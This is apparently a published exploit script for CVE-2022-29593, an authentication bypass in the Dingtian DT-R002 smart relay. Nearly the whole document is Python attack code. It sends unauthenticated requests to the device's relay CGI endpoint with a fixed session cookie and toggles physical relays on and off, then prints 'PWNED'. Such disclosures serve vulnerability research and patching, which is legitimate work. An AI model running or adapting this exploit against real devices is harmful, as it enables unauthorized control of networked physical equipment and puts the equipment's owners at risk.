# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
# Google Dork: NA
# Date: 13th July 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
# Version: V3.1.276A
# Tested on: MAC OSX
# CVE : CVE-2022-29593#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# DingTian DT-R002 2CH Smart Relay
# CWE-294 - Authentication Bypass by Capture-replay
import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
print ("[+]********************************************************************************[+]")
print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")
print ("| Description: DingTian DT-R002 2CH Smart Relay |")
print ("| Usage : "+sys.argv[0]+" <host> <relay#> |")
print ("[+]********************************************************************************[+]")
def main():
os.system('clear')
banner()
urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"
urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"
urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"
urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"
headers = {
"Host": ""+host+"",
"User-Agent": "9lyph/3.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"DNT": "1",
"Connection": "close",
"Referer": "http://"+host+"/relay_cgi.html",
"Cookie": "session=4463009"
}
print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
for i in range(5):
time.sleep (1)
print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
try:
if (relay == "1"):
print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay1On)
time.sleep (5)
print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)
r = requests.get(urlRelay1Off)
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
elif (relay == "2"):
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay2On)
time.sleep (5)
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay2Off)
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
else:
print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)
except KeyboardInterrupt:
sys.exit(1)
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except Exception as e:
print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)
if __name__ == "__main__":
if len(sys.argv)>2:
host = sys.argv[1]
relay = sys.argv[2]
main ()
else:
print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)